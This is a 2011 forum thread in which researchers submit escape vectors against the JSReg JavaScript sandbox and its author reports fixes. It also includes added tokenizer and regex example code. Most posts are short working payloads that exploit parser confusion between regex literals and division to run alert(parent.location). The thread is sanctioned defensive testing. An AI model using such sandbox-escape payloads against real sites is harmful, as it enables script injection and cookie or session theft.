Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 14, 2011 08:06PM

1. As I understand it, the latest fix does not solve the problem of differentiating between a block delimiter and an object literal, but it converts a JSReg break into a syntax error, which is not dangerous.

for(;{}/1/1;){} --> for (;{}/(?:)/.$constructor$(/1/)1;){} // Syntax error
1/{}/alert(1)/1 --> 1/{}/(?:)/.$constructor$(/alert(1)/)1 // etc

I hope you clean it in the future.

2. Non-FF browsers

var x
1
/'lo/,alert(parent.location)//'


I have not watched all the changes yet.

3. /[]/]/ <-- this works in IE8 Standards mode too (tested on IE9) and fixed in IE9 Standards mode (blogpost).

4. // I don't know how to thank...

I must confess that I don't do testing of filters, sandboxes and millions of other protections, as it might seem. My activity is just a small reward for the ideas that you have shared with the world for many years, and not the result of your refined trolling ~ a year ago. :)) Otherwise, I would have come to the party faster, wouldn't I?
Thank you!

----------------------
~Veritas~



Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 15, 2011 06:02AM

LeverOne Wrote:
-------------------------------------------------------
> 1. As I understand it, the latest fix does not
> solve the problem of differentiating between a
> block delimiter and an object literal, but it
> converts a JSReg break into a syntax error, which is
> not dangerous.
>
> for(;{}/1/1;){} --> for (;{}/(?:)/.$constructor$(/1/)1;){} // Syntax error
> 1/{}/alert(1)/1 --> 1/{}/(?:)/.$constructor$(/alert(1)/)1 // etc
>
> I hope you clean it in the future.

Yeah, it eliminates the difference between divide and regex by raising a syntax error, because the regex is rewritten to force an error if it's used in a divide operation. Mike from the Caja project pointed this idea out in Caja and I thought it would be useful to apply here. Hopefully I can find a better fix.

>
> 2. Non-FF browsers
>
> var x
> 1
> /'lo/,alert(parent.location)//'
>

Fixed this thanks

>
> I have not watched all the changes yet.
>
> 3. /[]/]/ <-- this works in IE8 Standards mode
> too (tested on IE9) and fixed in IE9 Standards
> mode (blogpost).

Ah thanks, I'll update the post. I thought it was 8 for some reason

> 4. // I don't know how to thank...
>
> I must confess that I don't do testing of filters,
> sandboxes and millions of other protections, as it
> might seem. My activity is just a small reward
> for the ideas that you have shared with the world for
> many years, and not the result of your refined
> trolling ~ a year ago. :)) Otherwise, I would have come
> to the party faster, wouldn't I?
> Thank you!


Hehe well thanks very much! It's very appreciated

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 15, 2011 10:12AM

var n
/'lo/,alert(parent.location)//'

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 15, 2011 11:35AM

I backed out of my var statement tracking since it clearly wasn't working and was causing all sorts of syntax errors. I now check for a new line followed by a "/" and then automatically insert a semi-colon.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 18, 2011 09:42AM

while(0){x:1}/'lo/,alert(parent.location)//'

bug:

do{}while(0)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 18, 2011 10:38AM

Fixed thanks!

I forgot to check for the last statement when the next curly begins. The no-curly bug will be fixed in the future if the sandbox fails to be broken. I'm tracking the opening and closing parens, so it should in theory be pretty easy to fix.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 18, 2011 11:44AM

if(1){function x(){}/'lo/,alert(parent.location)}//'

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 18, 2011 12:52PM

Thanks, and fixed: the if statement wasn't being reset, so the function was being detected as a function expression. The paren tracking is working well, but it seems this vector you pointed out could be another weak area in my code; I may have to rewrite how JSReg detects functions and function expressions as well as block statements and object literals.

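The question the last few posts keep circling is whether a "/" starts a regex literal or is the divide operator, and the answer after "}" depends on what that "}" closed: a block (regex follows), an object literal or a function-expression body (divide follows). The tokenizer below is an added example written for this page, not JSReg's code and not how JSReg is implemented; it keeps the previous token plus a stack remembering what each "(" and "{" opened, and is checked against the vectors posted above (1/{}/alert(1)/1, for(;{}/1/1;){}, while(0){x:1}/'lo/..., if(1){function x(){}/'lo/...). It deliberately leaves out ASI, block comments and the ternary ":" (a ":" outside an object literal is treated as a label), which is a hint at how many contexts a correct detector has to model.

```javascript
const KEYWORDS = new Set(['if', 'for', 'while', 'with', 'switch', 'catch', 'function', 'return', 'typeof',
  'instanceof', 'in', 'new', 'delete', 'void', 'throw', 'case', 'do', 'else', 'try', 'finally']);
const HEADER_KW = new Set(['if', 'for', 'while', 'with', 'switch', 'catch']), WORD = /[\w$]+/y;
const REGEX = /\/(?:\\.|\[(?:\\.|[^\]\\])*\]|[^\/\\\[\n])*\//y;   // literal body honours [...] and \ escapes
const STRING = /'(?:\\.|[^'\\\n])*'|"(?:\\.|[^"\\\n])*"/y;

function tokenize(src) {
  const toks = [], stack = [];                    // stack frames: {ch: '(' or '{', kind}
  const prev = (n = 1) => toks[toks.length - n], top = () => stack[stack.length - 1];
  const stmtStart = () => {                       // may a statement begin here? then "{" is a block
    const p = prev(); if (!p) return true;
    if (p.type === 'keyword') return ['else', 'do', 'try', 'finally'].includes(p.value);
    if (p.type !== 'punct') return false;
    if (p.value === ';') return !(top() && top().ch === '(');   // for(;;) separators do not count
    return p.value === '{' || p.value === '}' || (p.value === ')' && (p.closes === 'stmt' || p.closes === 'fndecl'));
  };
  // "/" starts a regex unless the previous token ended an operand; for ")" and "}" that depends on what they closed.
  const regexAllowed = () => {
    const p = prev(); if (!p || p.type === 'keyword') return true;
    if (p.type !== 'punct') return false;             // word, string or regex literal
    if (p.value === ')') return p.closes === 'stmt';  // if(x) /re/  vs  (x)/re/
    if (p.value === '}') return p.closes === 'block'; // block vs object literal or function expression body
    return p.value !== ']';
  };
  for (let i = 0, m; i < src.length;) {
    const c = src[i], p = prev();
    if (/\s/.test(c)) { i++; continue; }
    if (c === '/' && src[i + 1] === '/') { const e = src.indexOf('\n', i); i = e < 0 ? src.length : e; continue; }
    const lit = c === '/' && regexAllowed() ? REGEX : c === '"' || c === "'" ? STRING : null;
    if (lit && (lit.lastIndex = i, m = lit.exec(src))) {          // regex or string literal
      toks.push({ type: lit === REGEX ? 'regex' : 'str', value: m[0] }); i += m[0].length; continue;
    }
    if ((WORD.lastIndex = i, m = WORD.exec(src))) {               // identifiers, keywords and numbers alike
      const t = { type: KEYWORDS.has(m[0]) ? 'keyword' : 'word', value: m[0] };
      if (m[0] === 'function') t.isDecl = stmtStart();            // declaration or expression?
      toks.push(t); i += m[0].length; continue;
    }
    const t = { type: 'punct', value: c };            // one character per punctuator is enough here
    if (c === '(') {
      const fn = p && p.value === 'function' ? p : p && p.type === 'word' && prev(2) && prev(2).value === 'function' ? prev(2) : null;
      stack.push({ ch: '(', kind: fn ? (fn.isDecl ? 'fndecl' : 'fnexpr') : p && HEADER_KW.has(p.value) ? 'stmt' : 'expr' });
    } else if (c === '{') {
      stack.push({ ch: '{', kind: p && p.value === ')' && p.closes === 'fnexpr' ? 'fnexpr'   // expression body
        : p && p.value === ':' ? (top() && top().kind === 'object' ? 'object' : 'block')    // key vs label
        : stmtStart() ? 'block' : 'object' });
    } else if (c === ')' || c === '}') t.closes = (stack.pop() || {}).kind;
    toks.push(t); i++;
  }
  return toks;
}
// In order, how each "/" outside comments and strings was read: 'regex' or 'divide'.
function slashKinds(src) {
  return tokenize(src).filter(t => t.type === 'regex' || t.value === '/').map(t => t.type === 'regex' ? 'regex' : 'divide');
}
```

For the vectors above it agrees with the browser: the two "object literal" cases yield only divides, while the block cases and the function declaration inside if(1){...} yield a regex after the "}".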
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 18, 2011 09:32PM

I knew the way of exploitation by Jonas would come in handy...

for(;function(){}['constructor']('alert(parent.location)')();lo){}

This means that in some cases we can bypass /(?:)/.$constructor$(/blabla/)

var x
  /'lo/,alert(parent.location)//'

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 19, 2011 06:59AM

That is one sweet bypass, damn you :D

and fixed
I remove new lines and check if an eos should be added, and when an array is detected I force an eos.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 19, 2011 11:36AM

1/ /./;~{
lo:{}/'/,alert(parent.location)//'/ /./}


bugs for TODO:

x=[];

x:for(;;){break x;}

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 19, 2011 12:23PM

Fixed that VERY nice vector and fixed those bugs. In addition I've basically created a minifier and semi-colon insertion, since new lines can affect what an object is and a semi-colon is very important for what happens next.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 19, 2011 09:18PM

GC only (tested on 14.0.825.0 dev-m Win)

/lo/\u002E\u003B\u0061\u006C\u0065\u0072\u0074\u0028\u0070\u0061\u0072\u0065\u006E\u0074\u005B\u0027\u006C\u006F\u0063\u0061\u0074\u0069\u006F\u006E\u0027\u005D\u0029\u002F\u002F


added later:

old issue:

if(0){}else{function x(){}/'lo/,alert(parent.location)}//'

try{function x(){}/'lo/,alert(parent.location)}catch(e){}//'

try{}catch(e){}finally{function x(){}/'lo/,alert(parent.location)}//'

bugs:

if(0){}
else{}

x=[
12];

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 20, 2011 08:48AM

That one is beautiful! Looks like a work of art :)
Fix soon when I get time

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 20, 2011 06:30PM

Fixed 'em all apart from the if(0){}else{} bug. I'll have to track if statements for that, which I don't currently do; it's on my todo list though. I've no idea why I was auto-decoding unicode, I simply removed it.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 20, 2011 09:05PM

function x(){}function y(){}/'lo/,alert(parent.location)//'

// FF only

function(lo)/'/;alert(parent.location)//'

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 21, 2011 05:25AM

Thanks!
Fixed: checked for a missing curly in function and changed the function expression check to make sure a function doesn't follow a function.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 21, 2011 11:25PM

function function(){}/'lo/,alert(parent.location)//'

1/
/./;~{
lo:{}/'/,alert(parent.location)//'}


bug:

alert([])

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 22, 2011 05:56AM

Fixed! These are great attacks, thanks.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 22, 2011 09:38AM

bugs:

[/x/]

[[]]

function x(){}(1)

function x()
{}


Great progress in terms of security! For example, I don't know how I'm going to bypass it next time.

Re: JSReg sandbox challenge
Date: July 22, 2011 09:53AM

Wow LeverOne, impressive stuff!

Here's a new kind of vector that I don't remember seeing before:

[]/0//alert(window[),('location'])

Translates into:

;[];/(?:)/.$constructor$(/0/)/$alert$($window$[J.P(),('location')])

The browser sees Array/0//comment, but JSReg sees Array;RegExp/alert(...)
In the comment we can put any syntax that will break the JSReg parser.

Another bug:
[0 for(x in 0)]

You should try to go for a full parser and not rely on the parser of the browser, since JSReg only handles a subset of what the browser can handle. If you have a full JS parser, then you can reject programs that do not adhere to the subset you allow. Now you can only make a best effort interpretation of the code, meaning that any differences between the parsers may lead to vulnerabilities.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 22, 2011 11:41AM

@lever_one

Fixed those rewriting errors thanks!

@jonas

Quote

Another bug:
[0 for(x in 0)]

This isn't a bug, I don't allow generators. I check for any statements that don't have a "{" then raise a syntax error.

Quote

[]/0//alert(window[),('location'])

Impressive vector, here the regex logic was incorrect and now it correctly parses the comment and divide.

Quote

You should try to go for a full parser and not rely on the parser of the browser, since JSReg only handles a subset of what the browser can handle. If you have a full JS parser, then you can reject programs that do not adhere to the subset you allow. Now you can only make a best effort interpretation of the code, meaning that any differences between the parsers may lead to vulnerabilities.

Yeah, I would do if I thought the attacks worked at the design level like before, but in any of the cases submitted recently it's been human error with the logic of the syntax detection.

Now it's much stronger than previously but if you really want me to do a full parser please break it into pieces at the design level :D ideally I should wrap all objects and force them into their correct type as well but I'm seeing what's possible with the current method before I write more code. I don't think you'll be able to break it soon ;)

Then the big plan after it's assumed safe is modifying it the way slackers see it, for example reduce code, wrap objects and anything else; then we have an amazing sandbox to use on any project that we like.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 25, 2011 09:53AM

@Gareth

Fix for (1)\n/0// fails on Opera and IE in document mode <= IE8.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 25, 2011 09:59AM

@LeverOne

Thanks! Damn all these browser differences.

Narrowed it down to this:-
alert(/^.+[^x]/.test("aaaaaaax"));

I was assuming that the negative char class wouldn't match, so now I do a match without a ^ and reverse the if statement instead. In other words fixed :) but this still doesn't explain why on some browsers it worked since their behaviour was the same.

UPDATE.....
So I've added missing curly support in statements now; JSReg will attempt to correct any missing curlys in functions and other statements.

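The one-liner Gareth narrowed it down to is a regex backtracking surprise rather than a browser quirk, and it is worth seeing spelled out. This is an added example for this page, not JSReg's code: the greedy .+ first swallows the whole string and then gives back characters until [^x] can match, so nothing ties [^x] to the last character unless the pattern is anchored with $. The anchored form is one correct way to express "last character is not x"; it is my assumption, not the change the post describes.

```javascript
// Added example, not JSReg's code: why /^.+[^x]/.test("aaaaaaax") is true.
const LOOSE = /^.+[^x]/;      // the check quoted in the post: [^x] may match any non-final char
const ANCHORED = /^.+[^x]$/;  // assumed correction: [^x] must be the final character

// Returns the text a regex actually consumed (or null), which makes the backtracking visible:
// on "aaaaaaax" LOOSE matches the first seven characters, leaving the trailing "x" unexamined.
function matchedText(s, re) {
  const m = re.exec(s);
  return m ? m[0] : null;
}

// The intended test: does the string end in something other than "x"?
function endsWithNonX(s) {
  return ANCHORED.test(s);
}
```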
Re: JSReg sandbox challenge
Date: July 26, 2011 02:11PM

@Gareth - About the generator stuff; I know you don't allow them, but in the version I was using at that time the translation was [0 for $r$($x$ in 0)]. Now it works as it should! ;)

There are still some problems with Arrays and operators, but nothing I've managed to exploit.

[]+0
[]-0
[]*0
~[]

Some other problems:

++/0/[0]

[]?[]:[]

0+ +0

if(0){}else;

if(0)
{}

This could become something: [][[]]++<x+/>0/
Lots of confusion in that one, RegEx or E4X?

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 26, 2011 06:03PM

~function(lo)/**/{}/'/,alert(parent.location)}()//'

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 26, 2011 06:28PM

@jonas

Thanks! Fixed most of those, generators aren't allowed since I have to insert curlys to fix for..in statements. The e4x one should be detected as I disable e4x and since the "<" has to occur without anything to the "left" it should be "impossible" to inject ;)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 26, 2011 06:29PM

@lever_one

Ugh. Might just have to disable curlys :(

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: July 26, 2011 10:23PM

function()lo
function(){}/'/,alert(parent.location)//'

bugs:

function()alert(arguments)

(function()alert(1))()

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 27, 2011 06:54AM

Fixed all those bugs, now I allow no curlys but don't insert them. Generators should work too.
